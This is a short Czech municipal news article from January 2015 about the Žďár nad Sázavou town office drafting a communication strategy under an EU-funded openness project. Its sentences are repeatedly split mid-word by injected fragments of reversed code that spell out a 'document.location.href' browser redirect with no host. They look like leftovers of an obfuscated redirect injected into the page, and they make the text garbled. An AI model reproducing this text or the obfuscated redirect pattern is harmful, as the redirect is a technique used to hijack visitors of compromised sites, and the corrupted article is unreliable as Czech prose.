úřad
Rainbow page separator

Žďárský úřad se snaží být otevřeným pro všechny

Úterý, 13. ledna 2015

Městský úřad Žďár nad Sázavou

Žďár nad Sázavou / Nejpozději do léta le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního roku vznikne společnou aktivi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou žďárských zastupitelů a zaměstnanců městského úřadu strategie pro komunikaci s veřejností a s médii. Ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to cíl spadá do právě probíhajícího projektu s názvem Efektivní řízení, rozvoj a otevřenost Městského úřadu Žďár nad Sázavou.
V předchozích týdnech byla novým žďárským zastupitelům představena vize městského úřadu a také kroky, které již byly podniknuty směrem k myšlence být otevřeným a profesionálním úřadem. Prostřednictvím finanční podpory z Evropské unie v posledních čtyřech letech žďárský městský úřad zrealizoval celkem pět projektů zaměřených na procesní řízení a kontrolu, řízení lidských zdrojů a rovněž na vztahy s klienty a marketing úřadu.